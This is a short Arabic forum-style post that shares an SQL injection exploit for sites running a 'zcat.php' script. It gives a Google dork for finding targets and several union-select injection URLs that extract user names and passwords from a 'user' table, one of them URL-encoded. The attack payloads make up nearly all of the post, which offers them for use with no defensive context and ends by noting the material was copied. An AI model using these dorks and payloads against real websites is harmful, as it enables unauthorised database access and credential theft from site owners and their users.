بسم الله الرحمن الرحيم
الدورك
كود:
inurl:"zcat.php?id="
الاستغلال
كود:
[ Exploit ]
كود PHP:
http://server/zcat.php?id=-1+union+select+1,2,concat(user,char(58),pass),4,5+from+user
كود PHP:
http://server/cat.php?id=-3+union+select+1,group_concat(id,0x3a,user,0x3a,pass),3,4+from+user
[ ExOMPLE ]
كود PHP:
http://server/zcat.php?id=-64+union+select+1,2,concat%28user,char%2858%29,pass%29,4,5+from+user
منقووووول بعنف